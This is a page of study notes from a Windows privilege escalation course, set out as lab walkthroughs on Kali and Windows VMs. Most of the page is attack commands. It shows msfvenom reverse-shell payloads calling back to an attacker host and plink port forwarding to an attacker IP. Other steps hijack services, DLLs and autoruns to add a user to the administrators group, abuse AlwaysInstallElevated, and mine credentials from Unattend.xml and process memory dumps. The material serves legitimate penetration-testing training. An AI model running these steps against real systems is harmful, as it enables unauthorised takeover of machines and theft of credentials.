Win Priv Esc - TCM Course

LogoGitHub - TCM-Course-Resources/Windows-Privilege-Escalation-Resources: Compilation of Resources from TCM's Windows Priv Esc Udemy CourseGitHub
LogoChecklist - Local Windows Privilege EscalationHackTricks
LogoPayloadsAllTheThings/Windows - Privilege Escalation.md at master ยท swisskyrepo/PayloadsAllTheThingsGitHub

SYSTEM ENUM:

=====================

1. systeminfo #save all the data in a file and use it with ./windows-exploit-suggester.py

2. systeminfo | findstr /b /c:"OS Name" /c:"OS Versoin" /c:"System Type"

3. wmic qfe

4. wmic qfe Caption,Description,HotFixID,InstalledOn

5. wmic logicaldisk

6. wmic logicaldisk get caption,description,providername

7. wmic logicaldisk get caption

USER ENUM

===================

whoami

whoami /priv

whoami /groups

net user

net user <user>

net localgroup

net localgroup <group_name>

NETWORK ENUM:

======================

ipconfig

ipconfig /all # we might see the DC as a DNS server in the list !!!

arp -a

route print

netstat -ano

PASSWORD HUNTING:

========================

findstr /si password *.txt *.ini *.config

AV and FW ENUM

==================

sc query windefend

sc queryex type= service #enum servies

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Sherlock - https://github.com/rasta-mouse/Sherlock

Watson - https://github.com/rasta-mouse/Watson

PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

JAWS - https://github.com/411Hall/JAWS

Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester

Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/

Seatbelt - https://github.com/GhostPack/Seatbelt

SharpUp - https://github.com/GhostPack/SharpUp

Meterpreter > run post/multi/recon/local_exploit_suggester

if issues with Pip:

curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py

WINDOWS KERNEL EXPLOITS

==========================

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits

port forwarding with plink.exe

Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

We need to upload first plink.exe on the machine.

plink.exe -l root -pw <root_passwd> -R 445:127.0.0.1:445 <atacker_IP>

netstat -ano | grep 445

winexe -U Administrator%<password> //127.0.0.1 "cmd.exe"

What happens when I type getsystem? - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

cmdkey /list # search for stored credentials

mdb-sql <file>.mdb #opens .mdb files (access db files)

readpst #tool to read .pst files (MS office email files)

RUNAS command:

C:\Windows\System32\runas.exe /user:<domain>\<user> /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\<low_priv_user>\file.txt

Registry Escalation - Autorun

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe

2. In Autoruns, click on the โ€˜Logonโ€™ tab.

3. From the listed results, notice that the โ€œMy Programโ€ entry is pointing to โ€œC:\Program Files\Autorun Program\program.exeโ€.

4. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"

5. From the output, notice that the โ€œEveryoneโ€ user group has โ€œFILE_ALL_ACCESSโ€ permission on the โ€œprogram.exeโ€ file.

Exploitation

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use multi/handler

3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

5. In Metasploit (msf > prompt) type: run

6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe

7. Copy the generated file, program.exe, to the Windows VM.

Windows VM

1. Place program.exe in โ€˜C:\Program Files\Autorun Programโ€™.

2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

Kali VM

1. Wait for a new session to open in Metasploit.

2. In Metasploit (msf > prompt) type: sessions -i [Session ID]

3. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid

Registry Escalation - AlwaysInstallElevated

Detection

Windows VM

1.Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer

2.From the output, notice that โ€œAlwaysInstallElevatedโ€ value is 1.

3.In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer

4.From the output, notice that โ€œAlwaysInstallElevatedโ€ value is 1.

Exploitation

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use multi/handler

3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

5. In Metasploit (msf > prompt) type: run

6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi

7. Copy the generated file, setup.msi, to the Windows VM.

Windows VM

1.Place โ€˜setup.msiโ€™ in โ€˜C:\Tempโ€™.

2.Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi

Enjoy your shell! :)

Service Escalation - Registry

๏ปฟDetection

Windows VM

1. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

2. Notice that the output suggests that user belong to โ€œNT AUTHORITY\INTERACTIVEโ€ has โ€œFullContolโ€ permission over the registry key.

Exploitation

Windows VM

1. Copy โ€˜C:\Users\User\Desktop\Tools\Source\windows_service.cโ€™ to the Kali VM.

Kali VM

1. Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add

2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use 'sudo apt install gcc-mingw-w64')

3. Copy the generated file x.exe, to the Windows VM.

Windows VM

1. Place x.exe in โ€˜C:\Tempโ€™.

2. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

3. In the command prompt type: sc start regsvc

4. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Service Escalation - Executable Files

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"

2. Notice that the โ€œEveryoneโ€ user group has โ€œFILE_ALL_ACCESSโ€ permission on the filepermservice.exe file.

Exploitation

Windows VM

1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

2. In command prompt type: sc start filepermsvc

3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Privilege Escalation - Startup Applications

Detection

Windows VM

1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

2. From the output notice that the โ€œBUILTIN\Usersโ€ group has full access โ€˜(F)โ€™ to the directory.

Exploitation

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use multi/handler

3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

5. In Metasploit (msf > prompt) type: run

6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe

7. Copy the generated file, x.exe, to the Windows VM.

Windows VM

1. Place x.exe in โ€œC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startupโ€.

2. Logoff.

3. Login with the administrator account credentials.

Kali VM

1. Wait for a session to be created, it may take a few seconds.

2. In Meterpreter(meterpreter > prompt) type: getuid

3. From the output, notice the user is โ€œUser-PC\Adminโ€

icacls Documentation - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

Service Escalation - DLL Hijacking

Detection

Windows VM

1. Open the Tools folder that is located on the desktop and then go the Process Monitor folder.

2. In reality, executables would be copied from the victimโ€™s host over to the attackerโ€™s host for analysis during run time. Alternatively, the same software can be installed on the attackerโ€™s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select โ€˜Run as administratorโ€™ from the menu.

3. In procmon, select "filter". From the left-most drop down menu, select โ€˜Process Nameโ€™.

4. In the input box on the same line type: dllhijackservice.exe

5. Make sure the line reads โ€œProcess Name is dllhijackservice.exe then Includeโ€ and click on the โ€˜Addโ€™ button, then โ€˜Applyโ€™ and lastly on โ€˜OKโ€™.

6. Next, select from the left-most drop down menu โ€˜Resultโ€™.

7. In the input box on the same line type: NAME NOT FOUND

8. Make sure the line reads โ€œResult is NAME NOT FOUND then Includeโ€ and click on the โ€˜Addโ€™ button, then โ€˜Applyโ€™ and lastly on โ€˜OKโ€™.

9. Open command prompt and type: sc start dllsvc

10. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute โ€˜C:\Temp\hijackme.dllโ€™ yet it could not do that as the file was not found. Note that โ€˜C:\Tempโ€™ is a writable location.

Exploitation

Windows VM

1. Copy โ€˜C:\Users\User\Desktop\Tools\Source\windows_dll.cโ€™ to the Kali VM.

Kali VM

1. Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add

2. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

3. Copy the generated file hijackme.dll, to the Windows VM.

Windows VM

1. Place hijackme.dll in โ€˜C:\Tempโ€™.

2. Open command prompt and type: sc stop dllsvc & sc start dllsvc

3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Service Escalation - binPath

Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

2. Notice that the output suggests that the user โ€œUser-PC\Userโ€ has the โ€œSERVICE_CHANGE_CONFIGโ€ permission.

Exploitation

Windows VM

1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"

2. In command prompt type: sc start daclsvc

3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

Service Escalation - Unquoted Service Paths

Detection

Windows VM

1. Open command prompt and type: sc qc unquotedsvc

2. Notice that the โ€œBINARY_PATH_NAMEโ€ field displays a path that is not confined between quotes.

Exploitation

Kali VM

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe

2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in โ€˜C:\Program Files\Unquoted Path Serviceโ€™.

2. Open command prompt and type: sc start unquotedsvc

3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators

For additional practice, it is recommended to attempt the TryHackMe room Steel Mountain ( https://tryhackme.com/room/steelmountain)

Potato Escalation - Hot Potato

Exploitation

Windows VM

1. In command prompt type: powershell.exe -nop -ep bypass

2. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

3. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

4. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators

Password Mining Escalation - Configuration Files

Exploitation

Windows VM

1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml

2. Scroll down to the โ€œ<Password>โ€ property and copy the base64 string that is confined between the โ€œ<Value>โ€ tags underneath it.

Kali VM

1. In a terminal, type: echo [copied base64] | base64 -d

2. Notice the cleartext password

Password Mining Escalation - Memory

Exploitation

Kali VM

1.Open command prompt and type: msfconsole

2.In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic

3.In Metasploit (msf > prompt) type: set uripath x

4.In Metasploit (msf > prompt) type: run

Windows VM

1.Open Internet Explorer and browse to: http://[Kali VM IP Address]/x

2.Open command prompt and type: taskmgr

3.In Windows Task Manager, right-click on the โ€œiexplore.exeโ€ in the โ€œImage Nameโ€ columnand select โ€œCreate Dump Fileโ€ from the popup menu.

4.Copy the generated file, iexplore.DMP, to the Kali VM.

Kali VM

1.Place โ€˜iexplore.DMPโ€™ on the desktop.

2.Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

3.Select and Copy the Base64 encoded string.

4.In command prompt type: echo -ne [Base64 String] | base64 -d

5.Notice the credentials in the output.

Privilege Escalation - Kernel Exploits

Establish a shell

Kali VM

1. Open command prompt and type: msfconsole

2. In Metasploit (msf > prompt) type: use multi/handler

3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

5. In Metasploit (msf > prompt) type: run

6. Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe

7. Copy the generated file, shell.exe, to the Windows VM.

Windows VM

1. Execute shell.exe and obtain reverse shell

Detection & Exploitation

Kali VM

1. In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester

2. Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation

3. In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif

4. In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]

5. In Metasploit (msf > prompt) type: set LPORT 5555

6. In Metasploit (msf > prompt) type: run

NOTE: The shell might default to your eth0 during this attack. If so, ensure you type set lhost [Kali VM IP Address] and run again.

LogoMounting VHD file on Kali Linux through remote shareMedium
LogoHow to capture MSSQL credentials with xp_dirtree, smbserver.pyMedium
Logopowerview.ps1kashz-jewels
PreviousWindows Kernel ExploitsNextWindows Process Dump

Last updated